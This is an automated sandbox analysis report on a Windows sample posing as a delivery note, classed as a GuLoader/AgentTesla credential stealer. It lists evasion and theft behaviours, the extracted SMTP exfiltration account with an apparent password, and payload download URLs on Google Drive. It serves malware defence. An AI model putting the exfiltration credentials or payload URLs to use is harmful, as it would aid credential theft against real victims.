Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Delivery note_241493.exe

Overview

General Information

Sample Name:Delivery note_241493.exe
Analysis ID:1645
MD5:ae27dccff11f1c8e17661269d90148b9
SHA1:365138784e65ad92bc8f05653374348aa4e00788
SHA256:dd739f42791b213769f242efac95b60d0026825d5c882d576533cd8ae57514b6
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected AgentTesla
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • Delivery note_241493.exe (PID: 8872 cmdline: 'C:\Users\user\Desktop\Delivery note_241493.exe' MD5: AE27DCCFF11F1C8E17661269D90148B9)
    • RegAsm.exe (PID: 1832 cmdline: 'C:\Users\user\Desktop\Delivery note_241493.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 1660 cmdline: 'C:\Users\user\Desktop\Delivery note_241493.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 2672 cmdline: 'C:\Users\user\Desktop\Delivery note_241493.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 2804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "tamasfulop@csavarcsapagyexpress.huRozsnyoi42mail.csavarcsapagyexpress.husirevirus39@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1001013711.00000000023A0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    0000001A.00000002.5633190528.000000001DCC1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000001A.00000002.5633190528.000000001DCC1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: RegAsm.exe PID: 2672JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegAsm.exe PID: 2672JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            Networking:

            barindex
            Sigma detected: RegAsm connects to smtp portShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.111.89.226, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 2672, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49769

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: conhost.exe.2804.27.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "tamasfulop@csavarcsapagyexpress.huRozsnyoi42mail.csavarcsapagyexpress.husirevirus39@gmail.com"}
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_01150280 CryptUnprotectData,26_2_01150280
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_01150A09 CryptUnprotectData,26_2_01150A09
            Source: Delivery note_241493.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49755 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.11.20:49756 version: TLS 1.2

            Networking:

            barindex
            Source: Joe Sandbox ViewASN Name: WEBSUPPORT-SRO-SK-ASSK WEBSUPPORT-SRO-SK-ASSK
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1kFeDtVEJdXDeWXxKM0sf_SDs1MXR4dov HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/p9irpuq1lj8ip6m4433g3knsldrdvp8d/1634135550000/12448148553778765603/*/1kFeDtVEJdXDeWXxKM0sf_SDs1MXR4dov?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-9g-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49769 -> 185.111.89.226:587
            Source: global trafficTCP traffic: 192.168.11.20:49769 -> 185.111.89.226:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: RegAsm.exe, 0000001A.00000002.5633190528.000000001DCC1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 0000001A.00000002.5633190528.000000001DCC1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 0000001A.00000002.5633190528.000000001DCC1000.00000004.00000001.sdmpString found in binary or memory: http://Hpdghc.com
            Source: RegAsm.exe, 0000001A.00000002.5642251197.000000001FF46000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: RegAsm.exe, 0000001A.00000003.972127154.0000000001086000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RegAsm.exe, 0000001A.00000002.5642251197.000000001FF46000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: RegAsm.exe, 0000001A.00000002.5635743077.000000001DDE5000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
            Source: RegAsm.exe, 0000001A.00000003.972127154.0000000001086000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RegAsm.exe, 0000001A.00000002.5635743077.000000001DDE5000.00000004.00000001.sdmpString found in binary or memory: http://csavarcsapagyexpress.hu
            Source: RegAsm.exe, 0000001A.00000002.5635743077.000000001DDE5000.00000004.00000001.sdmpString found in binary or memory: http://mail.csavarcsapagyexpress.hu
            Source: RegAsm.exe, 0000001A.00000002.5642251197.000000001FF46000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: RegAsm.exe, 0000001A.00000003.972127154.0000000001086000.00000004.00000001.sdmp, RegAsm.exe, 0000001A.00000003.977239633.0000000001084000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: RegAsm.exe, 0000001A.00000003.972558924.0000000001081000.00000004.00000001.sdmpString found in binary or memory: https://doc-04-9g-docs.googleusercontent.com/
            Source: RegAsm.exe, 0000001A.00000003.977239633.0000000001084000.00000004.00000001.sdmpString found in binary or memory: https://doc-04-9g-docs.googleusercontent.com/5
            Source: RegAsm.exe, 0000001A.00000003.972558924.0000000001081000.00000004.00000001.sdmp, RegAsm.exe, 0000001A.00000003.977239633.0000000001084000.00000004.00000001.sdmpString found in binary or memory: https://doc-04-9g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/p9irpuq1
            Source: RegAsm.exe, 0000001A.00000002.5614964275.0000000001040000.00000004.00000020.sdmpString found in binary or memory: https://doc-04-9g-docs.googleusercontent.com/ij7
            Source: RegAsm.exe, 0000001A.00000002.5614964275.0000000001040000.00000004.00000020.sdmpString found in binary or memory: https://doc-04-9g-docs.googleusercontent.com/qi;
            Source: RegAsm.exe, 0000001A.00000003.972558924.0000000001081000.00000004.00000001.sdmpString found in binary or memory: https://doc-04-9g-docs.googleusercontent.com/tography
            Source: RegAsm.exe, 0000001A.00000002.5613874054.0000000000FF8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: RegAsm.exe, 0000001A.00000003.972558924.0000000001081000.00000004.00000001.sdmp, RegAsm.exe, 0000001A.00000002.5613195333.0000000000EA0000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1kFeDtVEJdXDeWXxKM0sf_SDs1MXR4dov
            Source: RegAsm.exe, 0000001A.00000003.972558924.0000000001081000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1kFeDtVEJdXDeWXxKM0sf_SDs1MXR4dov90yJjkpGPPugIoOr0
            Source: RegAsm.exe, 0000001A.00000002.5633190528.000000001DCC1000.00000004.00000001.sdmp, RegAsm.exe, 0000001A.00000003.1894514695.0000000000ED1000.00000004.00000001.sdmpString found in binary or memory: https://jRW95HZ6DAQuQZac.org
            Source: RegAsm.exe, 0000001A.00000002.5635743077.000000001DDE5000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: RegAsm.exe, 0000001A.00000002.5633190528.000000001DCC1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1kFeDtVEJdXDeWXxKM0sf_SDs1MXR4dov HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/p9irpuq1lj8ip6m4433g3knsldrdvp8d/1634135550000/12448148553778765603/*/1kFeDtVEJdXDeWXxKM0sf_SDs1MXR4dov?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-9g-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49755 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.11.20:49756 version: TLS 1.2
            Source: Delivery note_241493.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_004016790_2_00401679
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_0040162C0_2_0040162C
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_0040143D0_2_0040143D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0093113026_2_00931130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0093BA1826_2_0093BA18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00933A5026_2_00933A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0093432026_2_00934320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0093957026_2_00939570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0093C77826_2_0093C778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0093370826_2_00933708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00946AC826_2_00946AC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0094089026_2_00940890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0115916826_2_01159168
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0115CCA826_2_0115CCA8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_01155CE826_2_01155CE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0115C72826_2_0115C728
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_01154E0026_2_01154E00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0115E49826_2_0115E498
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0115E0C026_2_0115E0C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0115164026_2_01151640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_011699A826_2_011699A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_011669A826_2_011669A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0116DB2026_2_0116DB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0116C7D026_2_0116C7D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_01164EB026_2_01164EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0116333026_2_01163330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_1DAF5E0826_2_1DAF5E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_1DAF4ACC26_2_1DAF4ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_1DAF5E0326_2_1DAF5E03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_1DAF6AFB26_2_1DAF6AFB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_01166A6126_2_01166A61
            Source: Delivery note_241493.exe, 00000000.00000002.999532636.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTains4.exe vs Delivery note_241493.exe
            Source: Delivery note_241493.exeBinary or memory string: OriginalFilenameTains4.exe vs Delivery note_241493.exe
            Source: C:\Users\user\Desktop\Delivery note_241493.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dllJump to behavior
            Source: Delivery note_241493.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Delivery note_241493.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\Delivery note_241493.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Delivery note_241493.exe 'C:\Users\user\Desktop\Delivery note_241493.exe'
            Source: C:\Users\user\Desktop\Delivery note_241493.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Delivery note_241493.exe'
            Source: C:\Users\user\Desktop\Delivery note_241493.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Delivery note_241493.exe'
            Source: C:\Users\user\Desktop\Delivery note_241493.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Delivery note_241493.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Delivery note_241493.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Delivery note_241493.exe' Jump to behavior
            Source: C:\Users\user\Desktop\Delivery note_241493.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Delivery note_241493.exe' Jump to behavior
            Source: C:\Users\user\Desktop\Delivery note_241493.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Delivery note_241493.exe' Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Delivery note_241493.exeFile created: C:\Users\user\AppData\Local\Temp\~DFA880510812ECEB02.TMPJump to behavior
            Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@8/1@4/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2804:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2804:120:WilError_03
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000000.00000002.1001013711.00000000023A0000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_00405C5C push edx; retf 0_2_00405C6F
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_00405E5F push esp; ret 0_2_00405E60
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_00406809 pushad ; iretd 0_2_0040681A
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_00405A23 push cs; iretd 0_2_00405ADA
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_004038B9 push 4EA9091Fh; iretd 0_2_004038BE
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_00405376 pushad ; retf 0_2_004053D4
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_00405376 push esi; ret 0_2_004054C4
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_00406915 push edi; iretd 0_2_00406917
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_004053D5 push esi; ret 0_2_004054C4
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_023A1E7E push ds; iretd 0_2_023A1E7F
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_023A084B push es; ret 0_2_023A0854
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_023A1AD7 push es; ret 0_2_023A1AD8
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_023A0ED4 push cs; retf 0_2_023A0ED7
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_023A1737 push es; ret 0_2_023A1738
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_023A317F push esp; iretw 0_2_023A3180
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_023A2B99 push ebp; retf 0_2_023A2B9A
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_023A1790 push eax; iretd 0_2_023A1792
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_023A3B90 push esi; retf 0_2_023A3B9E
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_023A27D0 push es; ret 0_2_023A27D8
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 0_2_023A0BD5 push es; ret 0_2_023A0BD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_01162177 push edi; retn 0000h26_2_01162179
            Source: C:\Users\user\Desktop\Delivery note_241493.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
